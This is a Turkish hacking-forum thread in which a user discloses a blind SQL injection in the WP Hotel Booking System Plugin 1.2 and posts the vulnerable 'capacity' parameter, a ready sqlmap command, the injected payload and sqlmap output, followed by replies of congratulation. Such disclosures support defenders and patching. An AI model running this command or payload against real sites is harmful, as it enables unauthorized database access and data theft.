Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Exploitler > Bug Researchers

Bug Researchers Yeni bulunan açıklar.



WP Hotel Booking System Plugin 1.2 - SQL Injection / Pentester

Bug Researchers

Yeni Konu aç Cevapla
 
Seçenekler
Alt 06-05-2017 13:57   #1
  • Researcher
  • Üye Bilgileri
Üyelik tarihi
09/2016
Mesajlar
Konular

Teşekkür (Etti): 607
Teşekkür (Aldı): 459


WP Hotel Booking System Plugin 1.2 - SQL Injection / Pentester



WordPress Hotel Booking System Plugin 1.2 üzerinde yaptığım test sonucunda bulduğum, "Boolean-Based Blind SQL İnjection" zaafiyetini public ettim. Aynı zamanda videolu olarak anlattım.
Bug:
https://cxsecurity.com/issue/WLB-2017050039

Kod:
<------------------ header data start ------------------- >
#############################################################
# Application Name : WP Hotel Booking System Plugin 1.2 
# Vulnerable Type : Boolean-Based Blind SQL İnjection
# Software Link: https://www.bestsoftinc.com/
# Tested On Demo Site:
http://envato.bestsoftinc.net/wp-hotel/
# Author: Siber Güvenlik Akademisi - Pentester
# Date: 05.05.2017
# Tested on: Windows 8.1 / Mozilla Firefox
# Vulnerable Parameter: 'capacity' (POST)
# SQLİ: Http://localhost/wphotel/
# Proof of concept:
sqlmap -u "http://localhost/wphotel/" --data="check_in=05%2F05%2F2017&check_out=05%2F20%2F2017&capacity=1&child_per_room=1" -p "capacity" --random-agent --threads=5 --dbs

Parameter: capacity (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: check_in=05/10/2017&check_out=06/26/2017&capacity=1 AND 6953=6953&c
hild_per_room=1
---
[20:44:25] [INFO] testing MySQL
[20:44:28] [INFO] confirming MySQL
[20:44:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16

< ------------------- header data end of ------------------- >
VİDEO




___________________________________________

"Benim naçiz vücudum, bir gün elbet toprak olacaktır. Fakat Türkiye Cumhuriyeti, ilelebet payidar kalacaktır."
Mustafa Kemal ATATÜRK

Yapabildiğimiz her şeyi yapsaydık, buna kendimiz bile şaşardık.
 Offline  
 
Alıntı ile Cevapla
Alt 06-05-2017 14:00   #2
  • Üsteğmen
  • Üye Bilgileri
Üyelik tarihi
03/2017
Nereden
İzmir
Yaş
17
Mesajlar
Konular

Teşekkür (Etti): 143
Teşekkür (Aldı): 217




Ellerine sağlık
 Offline  
 
Alıntı ile Cevapla
Teşekkür

Pentester Teşekkür etti.
Alt 06-05-2017 14:01   #3
  • Tamamen Forumdan Uzaklaştırıldı
  • Üye Bilgileri
Üyelik tarihi
02/2016
Mesajlar
Konular

Teşekkür (Etti): 28
Teşekkür (Aldı): 4332




ellerine sağlık .
 Offline  
 
Alıntı ile Cevapla
Teşekkür

Pentester Teşekkür etti.
Alt 06-05-2017 14:07   #4
  • Binbaşı
  • Üye Bilgileri
Üyelik tarihi
03/2017
Nereden
Sinop
Mesajlar
Konular

Teşekkür (Etti): 101
Teşekkür (Aldı): 126




Eline sağlık



___________________________________________

2019 Dönüş Vakti Olacak.

 Offline  
 
Alıntı ile Cevapla
Teşekkür

Pentester Teşekkür etti.
Alt 06-05-2017 14:13   #5
  • Tamamen Forumdan Uzaklaştırıldı
  • Üye Bilgileri
Üyelik tarihi
06/2016
Nereden
l1ackerone
Mesajlar
Konular

Teşekkür (Etti): 2339
Teşekkür (Aldı): 1233




Eline Sağlık
 Offline  
 
Alıntı ile Cevapla
Teşekkür

Pentester Teşekkür etti.
Alt 06-05-2017 14:14   #6
  • Researcher
  • Üye Bilgileri
Üyelik tarihi
07/2016
Nereden
Hall of Fame
Mesajlar
Konular

Teşekkür (Etti): 509
Teşekkür (Aldı): 1253




Eline sağlık.



___________________________________________

Legendary
 Offline  
 
Alıntı ile Cevapla
Teşekkür

Pentester Teşekkür etti.
Alt 06-05-2017 14:16   #7
  • Yardımsever
  • Üye Bilgileri
Üyelik tarihi
04/2015
Nereden
Kayseri
Yaş
80
Mesajlar
Konular

Teşekkür (Etti): 7095
Teşekkür (Aldı): 7484




Ooo pentest coşturmuş buraları haberimiz yok
Zaafiyet kodlarına kadar sağlık kardeşim cansın



___________________________________________

Her çözüm geçerli bir çözüm değildir!
'GonzaLes

drwx--x--x
Tüm konularım için tıkla<
 Offline  
 
Alıntı ile Cevapla
Teşekkür

Pentester Teşekkür etti.
Alt 06-05-2017 14:19   #8
  • Researcher
  • Üye Bilgileri
Üyelik tarihi
09/2016
Mesajlar
Konular

Teşekkür (Etti): 607
Teşekkür (Aldı): 459




Alıntı:
'GonzaLes´isimli üyeden Alıntı Mesajı göster
Ooo pentest coşturmuş buraları haberimiz yok
Zaafiyet kodlarına kadar sağlık kardeşim cansın
zaafiyet kodları? WP Plugin zafiyetini yaratan kodlara sağlık diyorsun yani



___________________________________________

"Benim naçiz vücudum, bir gün elbet toprak olacaktır. Fakat Türkiye Cumhuriyeti, ilelebet payidar kalacaktır."
Mustafa Kemal ATATÜRK

Yapabildiğimiz her şeyi yapsaydık, buna kendimiz bile şaşardık.
 Offline  
 
Alıntı ile Cevapla
Teşekkür

'GonzaLes Teşekkür etti.
Alt 06-05-2017 14:20   #9
  • Yardımsever
  • Üye Bilgileri
Üyelik tarihi
04/2015
Nereden
Kayseri
Yaş
80
Mesajlar
Konular

Teşekkür (Etti): 7095
Teşekkür (Aldı): 7484




Alıntı:
Pentester´isimli üyeden Alıntı Mesajı göster
zaafiyet kodları? WP Plugin zafiyetini yaratan kodlara sağlık diyorsun yani
Tek o olmakla kalmasın klavyenin arasına giren pisküvüt parçasına kadar olsun be



___________________________________________

Her çözüm geçerli bir çözüm değildir!
'GonzaLes

drwx--x--x
Tüm konularım için tıkla<
 Offline  
 
Alıntı ile Cevapla
Alt 06-05-2017 14:22   #10
  • Researcher
  • Üye Bilgileri
Üyelik tarihi
09/2016
Mesajlar
Konular

Teşekkür (Etti): 607
Teşekkür (Aldı): 459




Alıntı:
'GonzaLes´isimli üyeden Alıntı Mesajı göster
Tek o olmakla kalmasın klavyenin arasına giren pisküvüt parçasına kadar olsun be
Arasan bulamazsın ya, temizdir neyse daha fazla post kasmayalım biz burada



___________________________________________

"Benim naçiz vücudum, bir gün elbet toprak olacaktır. Fakat Türkiye Cumhuriyeti, ilelebet payidar kalacaktır."
Mustafa Kemal ATATÜRK

Yapabildiğimiz her şeyi yapsaydık, buna kendimiz bile şaşardık.
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau